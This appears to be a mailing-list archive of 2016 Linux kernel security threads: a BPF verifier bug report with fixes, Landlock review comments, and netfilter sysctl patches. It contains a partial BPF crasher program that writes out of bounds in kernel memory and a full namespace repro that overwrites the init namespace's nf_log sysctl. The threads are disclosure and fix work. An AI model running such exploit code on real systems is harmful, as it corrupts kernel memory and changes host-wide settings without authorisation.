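A tiny userspace check of that arithmetic (nothing BPF-specific, just the
signed-AND claim):

#include <stdio.h>

/* For negative operands, a & b can be smaller than min(a, b), so min(a, b)
 * is not a safe signed lower bound for the result. */
int main(void)
{
    long a = -2, b = -3;

    printf("%ld & %ld = %ld, min(a, b) = %ld\n", a, b, a & b, b);
    /* prints: -2 & -3 = -4, min(a, b) = -3 */
    return 0;
}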


Re: 484611357c19 introduces arbitrary kernel write bug (root-only)

2016-11-09 Thread Jann Horn
Can you resend with "git send-email" or so? "git am" says that the
patch is corrupt, likely because of line wrapping.

On Wed, Nov 9, 2016 at 10:21 PM, Josef Bacik <jba...@fb.com> wrote:
> On 11/08/2016 07:23 PM, Jann Horn wrote:
>>
>> In 484611357c19 (not in any stable kernel yet), functionality is
>> introduced that allows root (and afaics nobody else, since nobody else
>> is allowed to perform pointer arithmetic) to basically write to (and
>> read from) arbitrary kernel memory. There are multiple bugs in the
>> validation logic:
>>
>>  - A bitwise AND of values in the ranges [a,b] and [c,d] is assumed to
>>    always result in a value >= a. However, for the combination of ranges
>>    [1,1] and [1,2], this calculates a minimum of 1 while actually, 1&2 is
>>    zero. This is the bug that my crasher (below) triggers.
>>  - a%b is assumed to always be smaller than b-1. However, for b==0, this
>>    will calculate an upper limit of -1 while the values will actually
>>    always be zero.
>>  - I'm not sure about this, but I think that, when only one end of the
>>    range is bounded, the logic will incorrectly also treat the other end
>>    as bounded, and because of the usage of bound placeholders that are
>>    smaller than the actual maximum values, this could be used to perform
>>    out-of-bounds accesses.
>>
>> The fun part here is that, as soon as the validation is just
>> off-by-one, arithmetic transformations can be used to turn that into
>> out-of-bounds accesses at arbitrary offsets. The crasher turns the
>> off-by-one into a memory write at offset 0x1000.
>>
>
> Can you give this a whirl?  It addresses your testcase and the other issues
> you've brought up.  Thanks
>
> From e47a1de98af2c1bcebd4224f546e3be1fd340b6a Mon Sep 17 00:00:00 2001
> From: Josef Bacik <jba...@fb.com>
> Date: Wed, 9 Nov 2016 16:09:52 -0500
> Subject: [PATCH] bpf: fix range arithmetic for bpf map access
>
> I made some invalid assumptions with BPF_AND and BPF_MOD that could result
> in
> invalid accesses to bpf map entries.  Fix this up by doing a few things
>
> 1) Kill BPF_MOD support.  This doesn't actually get used by the compiler in
> real life and just adds extra complexity.
>
> 2) Fix the logic for BPF_AND.  If the min value is negative then that is the
> new minimum, otherwise it is unconditionally 0.
>
> 3) Don't do operations on the ranges if they are set to the limits, as they
> are by definition undefined, and allowing arithmetic operations on those
> values could make them appear valid when they really aren't.
>
> This fixes the testcase provided by Jann as well as a few other theoretical
> problems.
>
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Josef Bacik <jba...@fb.com>
> ---
>  include/linux/bpf_verifier.h |  3 +-
>  kernel/bpf/verifier.c| 65
> 
>  2 files changed, 44 insertions(+), 24 deletions(-)
>
> diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
> index ac5b393..15ceb7f 100644
> --- a/include/linux/bpf_verifier.h
> +++ b/include/linux/bpf_verifier.h
> @@ -22,7 +22,8 @@ struct bpf_reg_state {
>  * Used to determine if any memory access using this register will
>  * result in a bad access.
>  */
> -   u64 min_value, max_value;
> +   s64 min_value;
> +   u64 max_value;
> u32 id;
> union {
> /* valid when type == CONST_IMM | PTR_TO_STACK |
> UNKNOWN_VALUE */
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 9002575..840533a 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -234,8 +234,8 @@ static void print_verifier_state(struct bpf_verifier_state *state)
> reg->map_ptr->value_size,
> reg->id);
> if (reg->min_value != BPF_REGISTER_MIN_RANGE)
> -   verbose(",min_value=%llu",
> -   (unsigned long long)reg->min_value);
> +   verbose(",min_value=%lld",
> +   (long long)reg->min_value);
> if (reg->max_value != BPF_REGISTER_MAX_RANGE)
> verbose(",max_value=%llu",
> (unsigned long long)reg->max_value);
> @@ -1490,7 +1490,7 @@ static void check_reg_overflow(struct bpf_reg_state *reg)
>  {
> if (reg->max_value > BPF_REGISTER_MAX_RANGE)
>   

484611357c19 introduces arbitrary kernel write bug (root-only)

2016-11-08 Thread Jann Horn
In 484611357c19 (not in any stable kernel yet), functionality is
introduced that allows root (and afaics nobody else, since nobody else
is allowed to perform pointer arithmetic) to basically write to (and
read from) arbitrary kernel memory. There are multiple bugs in the
validation logic:

 - A bitwise AND of values in the ranges [a,b] and [c,d] is assumed to
   always result in a value >= a. However, for the combination of ranges
   [1,1] and [1,2], this calculates a minimum of 1 while actually, 1&2 is
   zero. This is the bug that my crasher (below) triggers.
 - a%b is assumed to always be smaller than b-1. However, for b==0, this
   will calculate an upper limit of -1 while the values will actually
   always be zero.
 - I'm not sure about this, but I think that, when only one end of the
   range is bounded, the logic will incorrectly also treat the other end
   as bounded, and because of the usage of bound placeholders that are
   smaller than the actual maximum values, this could be used to perform
   out-of-bounds accesses.

The fun part here is that, as soon as the validation is just
off-by-one, arithmetic transformations can be used to turn that into
out-of-bounds accesses at arbitrary offsets. The crasher turns the
off-by-one into a memory write at offset 0x1000.
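
To sketch the amplification in pseudo-BPF (purely illustrative, not the
exact instruction sequence of the crasher below; whether the verifier
accepts each intermediate step depends on its range arithmetic, the point is
only that a one-off bound error composes with ordinary arithmetic into a
large fixed offset):

    r2 = r1 & r3    /* verifier: r1 in [1,1], r3 in [1,2], so r2 >= 1     */
                    /* runtime:  r1 = 1, r3 = 2, so r2 = 0                */
    r2 = 1 - r2     /* believed <= 0, actually 1                          */
    r2 <<= 12       /* the off-by-one is now a 0x1000-byte offset         */
    r0 += r2        /* r0 = pointer to a map value: believed unchanged,   */
                    /* actually advanced 0x1000 bytes past the checked    */
                    /* access                                             */
    *(u64 *)r0 = x  /* out-of-bounds kernel write                         */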

Here's the crasher program:
=
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* start from kernel */
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) {\
.code  = BPF_JMP | BPF_CALL,\
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = (FUNC) }) /* ??? */
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_REG_ARG1    BPF_REG_1
#define BPF_REG_ARG2    BPF_REG_2
#define BPF_REG_ARG3    BPF_REG_3
#define BPF_REG_ARG4    BPF_REG_4
#define BPF_REG_ARG5    BPF_REG_5
#define BPF_PSEUDO_MAP_FD   1
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) {\
.code  = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = (__u32) (IMM) }),  \
((struct bpf_insn) {\
.code  = 0, /* zero is reserved opcode */   \
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = ((__u64) (IMM)) >> 32 })
#define BPF_ALU32_IMM(OP, DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_OP(OP) | BPF_K,  \
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_LD_MAP_FD(DST, MAP_FD)  \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_ALU32_REG(OP, DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU | BPF_OP(OP) | BPF_X,  \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = 0 })
#define BPF_EXIT_INSN() \
((struct bpf_insn) {\
.code  = BPF_JMP | BPF_EXIT,\
.dst_reg = 0,   \
.src_reg = 0,   \
.off   = 0, \
.imm   = 0 })
/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)\
((struct bpf_insn) {\
.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off   = OFF,   \
.imm   = 0 })
#define BPF_REG_FP  BPF_REG_10
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_MOV | BPF_X,   \
.dst_reg = DST, \
.src_reg = SRC, \
.off   = 0, \
.imm   = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,\
.dst_reg = DST, \
.src_reg = 0,   \
.off   = 0, \
.imm   = IMM })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) {\
.code  = BPF_ALU64 | BPF_MOV | BPF_X,   \
.dst_reg = DST,   

Re: [kernel-hardening] [RFC v4 03/18] bpf,landlock: Add a new arraymap type to deal with (Landlock) handles

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 10:03:09PM +0200, Mickaël Salaün wrote:
> On 26/10/2016 21:01, Jann Horn wrote:
> > On Wed, Oct 26, 2016 at 08:56:39AM +0200, Mickaël Salaün wrote:
> >> This new arraymap looks like a set and brings new properties:
> >> * strong typing of entries: the eBPF functions get the array type of
> >>   elements instead of CONST_PTR_TO_MAP (e.g.
> >>   CONST_PTR_TO_LANDLOCK_HANDLE_FS);
> >> * force sequential filling (i.e. replace or append-only update), which
> >>   allows quick browsing of all entries.
> >>
> >> This strong typing is useful to statically check if the content of a map
> >> can be passed to an eBPF function. For example, Landlock uses it to store
> >> and manage kernel objects (e.g. struct file) instead of dealing with
> >> userland raw data. This improves efficiency and ensures that an eBPF
> >> program can only call functions with the right high-level arguments.
> >>
> >> The enum bpf_map_handle_type lists low-level types (e.g.
> >> BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) which are identified when
> >> updating a map entry (handle). These handle types are used to infer a
> >> high-level arraymap type, which is listed in enum bpf_map_array_type
> >> (e.g. BPF_MAP_ARRAY_TYPE_LANDLOCK_FS).
> >>
> >> For now, this new arraymap is only used by Landlock LSM (cf. next
> >> commits) but it could be useful for other needs.
> >>
> >> Changes since v3:
> >> * make handle arraymap safe (RCU) and remove buggy synchronize_rcu()
> >> * factor out the arraymay walk
> >>
> >> Changes since v2:
> >> * add a RLIMIT_NOFILE-based limit to the maximum number of arraymap
> >>   handle entries (suggested by Andy Lutomirski)
> >> * remove useless checks
> >>
> >> Changes since v1:
> >> * arraymap of handles replace custom checker groups
> >> * simpler userland API
> > [...]
> >> +  case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> >> +  handle_file = fget(handle->fd);
> >> +  if (IS_ERR(handle_file))
> >> +  return ERR_CAST(handle_file);
> >> +  /* check if the FD is tied to a user mount point */
> >> +  if (unlikely(handle_file->f_path.mnt->mnt_flags & 
> >> MNT_INTERNAL)) {
> >> +  fput(handle_file);
> >> +  return ERR_PTR(-EINVAL);
> >> +  }
> >> +  path_get(&handle_file->f_path);
> >> +  ret = kmalloc(sizeof(*ret), GFP_KERNEL);
> >> +  ret->path = handle_file->f_path;
> >> +  fput(handle_file);
> > 
> > You can use fdget() and fdput() here because the reference to
> > handle_file is dropped before the end of the syscall.
> 
> The reference to handle_file is dropped but not the reference to the
> (inner) path thanks to path_get().

That's irrelevant. As long as you promise to fdput() any references
acquired using fdget() before any of the following can happen, using
fdget() is okay:
 - the syscall exits
 - the fd table is shared with a process that might write to it
 - an fd is closed by the kernel
In other words, you must be able to prove that nobody can remove the
struct file * from your fd table before you fdput().

Taking a long-term reference to an object pointed to by a struct file
that was looked up with fdget() is fine.
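
For illustration, the pattern being suggested would look roughly like this
(kernel-style sketch, simplified from the quoted patch, error handling
trimmed):

	struct fd f = fdget(handle->fd);

	if (!f.file)
		return ERR_PTR(-EBADF);
	/* the long-term reference goes to the path, not to the struct file */
	path_get(&f.file->f_path);
	ret->path = f.file->f_path;
	fdput(f);	/* dropped before the syscall returns */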




Re: [kernel-hardening] [RFC v4 03/18] bpf,landlock: Add a new arraymap type to deal with (Landlock) handles

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 08:56:39AM +0200, Mickaël Salaün wrote:
> This new arraymap looks like a set and brings new properties:
> * strong typing of entries: the eBPF functions get the array type of
>   elements instead of CONST_PTR_TO_MAP (e.g.
>   CONST_PTR_TO_LANDLOCK_HANDLE_FS);
> * force sequential filling (i.e. replace or append-only update), which
>   allows quick browsing of all entries.
> 
> This strong typing is useful to statically check if the content of a map
> can be passed to an eBPF function. For example, Landlock uses it to store
> and manage kernel objects (e.g. struct file) instead of dealing with
> userland raw data. This improves efficiency and ensures that an eBPF
> program can only call functions with the right high-level arguments.
> 
> The enum bpf_map_handle_type lists low-level types (e.g.
> BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) which are identified when
> updating a map entry (handle). These handle types are used to infer a
> high-level arraymap type, which is listed in enum bpf_map_array_type
> (e.g. BPF_MAP_ARRAY_TYPE_LANDLOCK_FS).
> 
> For now, this new arraymap is only used by Landlock LSM (cf. next
> commits) but it could be useful for other needs.
> 
> Changes since v3:
> * make handle arraymap safe (RCU) and remove buggy synchronize_rcu()
> * factor out the arraymay walk
> 
> Changes since v2:
> * add a RLIMIT_NOFILE-based limit to the maximum number of arraymap
>   handle entries (suggested by Andy Lutomirski)
> * remove useless checks
> 
> Changes since v1:
> * arraymap of handles replace custom checker groups
> * simpler userland API
[...]
> + case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> + handle_file = fget(handle->fd);
> + if (IS_ERR(handle_file))
> + return ERR_CAST(handle_file);
> + /* check if the FD is tied to a user mount point */
> + if (unlikely(handle_file->f_path.mnt->mnt_flags & 
> MNT_INTERNAL)) {
> + fput(handle_file);
> + return ERR_PTR(-EINVAL);
> + }
> + path_get(&handle_file->f_path);
> + ret = kmalloc(sizeof(*ret), GFP_KERNEL);
> + ret->path = handle_file->f_path;
> + fput(handle_file);

You can use fdget() and fdput() here because the reference to
handle_file is dropped before the end of the syscall.


> + break;
> + case BPF_MAP_HANDLE_TYPE_UNSPEC:
> + default:
> + return ERR_PTR(-EINVAL);
> + }
> + ret->type = handle_type;
> + return ret;
> +}
> +
> +static void *nop_map_lookup_elem(struct bpf_map *map, void *key)
> +{
> + return ERR_PTR(-EINVAL);
> +}
> +
> +/* called from syscall or from eBPF program */
> +static int landlock_array_map_update_elem(struct bpf_map *map, void *key,
> + void *value, u64 map_flags)
> +{

This being callable from eBPF context is IMO pretty surprising and should
at least be well-documented. Also: What is the usecase here?




Re: [RFC v4 00/18] Landlock LSM: Unprivileged sandboxing

2016-10-26 Thread Jann Horn
On Wed, Oct 26, 2016 at 08:56:36AM +0200, Mickaël Salaün wrote:
> The loaded Landlock eBPF programs can be triggered by a seccomp filter
> returning RET_LANDLOCK. In addition, a cookie (16-bit value) can be passed
> from a seccomp filter to eBPF programs. This allows flexible security
> policies between seccomp and Landlock.

Is this still up to date, or was that removed in v3?




Re: [PATCH] netfilter: don't permit unprivileged writes to global state via sysctls

2016-10-22 Thread Jann Horn
On Thu, Oct 20, 2016 at 02:37:47PM -0400, David Miller wrote:
> From: Pablo Neira Ayuso <pa...@netfilter.org>
> Date: Thu, 20 Oct 2016 20:22:24 +0200
> 
> > On Sat, Sep 24, 2016 at 12:21:04AM +0200, Jann Horn wrote:
> >> This prevents the modification of nf_conntrack_max in unprivileged network
> >> namespaces. For unprivileged network namespaces, ip_conntrack_max is kept
> >> as a readonly sysctl in order to minimize potential compatibility issues.
> >> 
> >> This patch should apply cleanly to the net tree.
> > 
> > For the record: This patch looks good to me, but this legacy
> > ip_conntrack sysctl code is now gone.
> > 
> > I don't know what is the procedure to get this to -stable branches now
> > that this cannot be pushed upstream.
> 
> In the commit message for the -stable submission simply say "Not
> applicable" in the upstream commit reference.  Like:
> 
>   [ Upstream commit: Not applicable ]
> 
> or something like that.

Who should do that? Me, after getting a maintainer ack? Or the maintainer?




[PATCH] netfilter: don't permit unprivileged writes to global state via sysctls

2016-09-23 Thread Jann Horn
This prevents the modification of nf_conntrack_max in unprivileged network
namespaces. For unprivileged network namespaces, ip_conntrack_max is kept
as a readonly sysctl in order to minimize potential compatibility issues.

This patch should apply cleanly to the net tree.

Signed-off-by: Jann Horn <j...@thejh.net>
---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
index ae1a71a..a639e94 100644
--- a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
+++ b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
@@ -358,6 +358,9 @@ static int ipv4_init_net(struct net *net)
if (!in->ctl_table)
return -ENOMEM;
 
+   if (net->user_ns != &init_user_ns)
+   in->ctl_table[0].mode = 0444;
+
in->ctl_table[0].data = &nf_conntrack_max;
in->ctl_table[1].data = &net->ct.count;
in->ctl_table[2].data = &nf_conntrack_htable_size;
-- 
2.1.4



[PATCH] net: explicitly whitelist sysctls for unpriv namespaces

2016-09-18 Thread Jann Horn
There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent stuff like this from happening again
in the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.
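
For illustration, a table entry opts in like this (a made-up example entry,
not part of the diff below; the .namespaced field is what this patch adds):

	static int example_value;	/* hypothetical per-netns knob */

	static struct ctl_table example_ns_table[] = {
		{
			.procname	= "example_knob",
			.data		= &example_value,
			.maxlen		= sizeof(int),
			.mode		= 0644,
			.proc_handler	= proc_dointvec,
			.namespaced	= true,	/* stays writable for the netns owner */
		},
		{ }
	};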

Signed-off-by: Jann Horn <j...@thejh.net>
---
 include/linux/sysctl.h |  1 +
 net/ax25/sysctl_net_ax25.c |  4 +++-
 net/ieee802154/6lowpan/reassembly.c|  7 +--
 net/ipv4/devinet.c |  2 ++
 net/ipv4/ip_fragment.c | 10 ++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c |  4 +++-
 net/ipv4/xfrm4_policy.c|  1 +
 net/ipv6/addrconf.c|  1 +
 net/ipv6/icmp.c|  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c|  7 +--
 net/ipv6/sysctl_net_ipv6.c | 23 ++---
 net/ipv6/xfrm6_policy.c|  1 +
 net/mpls/af_mpls.c |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c | 26 
 net/netfilter/nf_conntrack_proto_generic.c |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c| 16 +++
 net/netfilter/nf_conntrack_proto_tcp.c | 26 
 net/netfilter/nf_conntrack_proto_udp.c |  4 
 net/netfilter/nf_conntrack_proto_udplite.c |  2 ++
 net/netfilter/nf_log.c |  1 +
 net/rds/tcp.c  |  2 ++
 net/sctp/sysctl.c  |  4 +++-
 net/sysctl_net.c   | 28 +-
 26 files changed, 154 insertions(+), 27 deletions(-)

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
struct ctl_table_poll *poll;
void *extra1;
void *extra2;
+   bool namespaced;/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
if (!table)
return -ENOMEM;
 
-   for (k = 0; k < AX25_MAX_VALUES; k++)
+   for (k = 0; k < AX25_MAX_VALUES; k++) {
table[k].data = &ax25_dev->values[k];
+   table[k].namespaced = true;
+   }
 
snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
ax25_dev->sysheader = register_net_sysctl(&init_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
-   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh
+   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
.extra1 = &zero,
-   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh
+   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxl

[PATCH] netfilter: fix namespace handling in nf_log_proc_dostring

2016-09-18 Thread Jann Horn
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char child_stack[100];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}

int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
  NULL))
err(1, "mount");

/* Yes, we need to set the maps for the net sysctls to recognize us
 * as namespace root.
 */
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);

stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}

int main(void) {
outer_uid = getuid();
outer_gid = getgid();

int child = clone(child_fn, child_stack + sizeof(child_stack),
  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");

char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <j...@thejh.net>
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index aa5847a..1df2c8d 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write,
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
-   struct net *net = current->nsproxy->net_ns;
+   struct net *net = table->extra2;
 
if (write) {
struct ctl_table tmp = *table;
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
-   nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(struct net *net)
}
}
 
+   for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+   table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
-- 
2.1.4



Re: [RFC v3 07/22] landlock: Handle file comparisons

2016-09-14 Thread Jann Horn
On Wed, Sep 14, 2016 at 09:24:00AM +0200, Mickaël Salaün wrote:
> Add eBPF functions to compare file system access with a Landlock file
> system handle:
> * bpf_landlock_cmp_fs_prop_with_struct_file(prop, map, map_op, file)
>   This function allows comparing the dentry, inode, device or mount
>   point of the currently accessed file with a reference handle.
> * bpf_landlock_cmp_fs_beneath_with_struct_file(opt, map, map_op, file)
>   This function allows an eBPF program to check if the currently accessed
>   file is the same as, or in the hierarchy of, a reference handle.
[...]
> diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
> index 94256597eacd..edaab4c87292 100644
> --- a/kernel/bpf/arraymap.c
> +++ b/kernel/bpf/arraymap.c
> @@ -603,6 +605,9 @@ static void landlock_put_handle(struct map_landlock_handle *handle)
>   enum bpf_map_handle_type handle_type = handle->type;
>  
>   switch (handle_type) {
> + case BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD:
> + path_put(&handle->path);
> + break;
>   case BPF_MAP_HANDLE_TYPE_UNSPEC:
>   default:
>   WARN_ON(1);
[...]
> diff --git a/security/landlock/checker_fs.c b/security/landlock/checker_fs.c
> new file mode 100644
> index ..39eb85dc7d18
> --- /dev/null
> +++ b/security/landlock/checker_fs.c
[...]
> +static inline u64 bpf_landlock_cmp_fs_prop_with_struct_file(u64 r1_property,
> + u64 r2_map, u64 r3_map_op, u64 r4_file, u64 r5)
> +{
> + u8 property = (u8) r1_property;
> + struct bpf_map *map = (struct bpf_map *) (unsigned long) r2_map;
> + enum bpf_map_array_op map_op = r3_map_op;
> + struct file *file = (struct file *) (unsigned long) r4_file;
> + struct bpf_array *array = container_of(map, struct bpf_array, map);
> + struct path *p1, *p2;
> + struct map_landlock_handle *handle;
> + int i;

Please don't use int when iterating over an array, use size_t.


> + /* for now, only handle OP_OR */

Is "OP_OR" an appropriate name for something that ANDs the success of
checks?


[...]
> + synchronize_rcu();

Can you put a comment here that explains what's going on?


> + for (i = 0; i < array->n_entries; i++) {
> + bool result_dentry = !(property & LANDLOCK_FLAG_FS_DENTRY);
> + bool result_inode = !(property & LANDLOCK_FLAG_FS_INODE);
> + bool result_device = !(property & LANDLOCK_FLAG_FS_DEVICE);
> + bool result_mount = !(property & LANDLOCK_FLAG_FS_MOUNT);
> +
> + handle = (struct map_landlock_handle *)
> + (array->value + array->elem_size * i);
> +
> + if (handle->type != BPF_MAP_HANDLE_TYPE_LANDLOCK_FS_FD) {
> + WARN_ON(1);
> + return -EFAULT;
> + }
> + p1 = &handle->path;
> +
> + if (!result_dentry && p1->dentry == p2->dentry)
> + result_dentry = true;

Why is this safe? As far as I can tell, this is not in an RCU read-side
critical section (synchronize_rcu() was just called), and no lock has been
taken. What prevents someone from removing the arraymap entry while we're
looking at it? Am I missing something?
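
(For reference, the usual shape of such a walk as I understand it -- purely
illustrative, the names are not from this patch:)

	rcu_read_lock();
	for (i = 0; i < n_entries; i++) {
		struct map_landlock_handle *h = rcu_dereference(entries[i]);

		if (h)
			compare_with(h);	/* valid until rcu_read_unlock() */
	}
	rcu_read_unlock();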


[...]
> +static inline u64 bpf_landlock_cmp_fs_beneath_with_struct_file(u64 r1_option,
> + u64 r2_map, u64 r3_map_op, u64 r4_file, u64 r5)
> +{
> + u8 option = (u8) r1_option;
> + struct bpf_map *map = (struct bpf_map *) (unsigned long) r2_map;
> + enum bpf_map_array_op map_op = r3_map_op;
> + struct file *file = (struct file *) (unsigned long) r4_file;
> + struct bpf_array *array = container_of(map, struct bpf_array, map);
> + struct path *p1, *p2;
> + struct map_landlock_handle *handle;
> + int i;

As above, please use size_t.




Re: [PATCH net 2/3] bpf: fix check_map_func_compatibility logic

2016-04-28 Thread Jann Horn
On Thu, Apr 28, 2016 at 3:56 AM, Alexei Starovoitov <a...@fb.com> wrote:
> The commit 35578d798400 ("bpf: Implement function bpf_perf_event_read() that 
> get the selected hardware PMU conuter")
> introduced clever way to check bpf_helper<->map_type compatibility.
> Later on commit a43eec304259 ("bpf: introduce bpf_perf_event_output() 
> helper") adjusted
> the logic and inadvertently broke it.
> Get rid of the clever bool compare and go back to two-way check
> from map and from helper perspective.
>
> Fixes: a43eec304259 ("bpf: introduce bpf_perf_event_output() helper")
> Reported-by: Jann Horn <ja...@google.com>
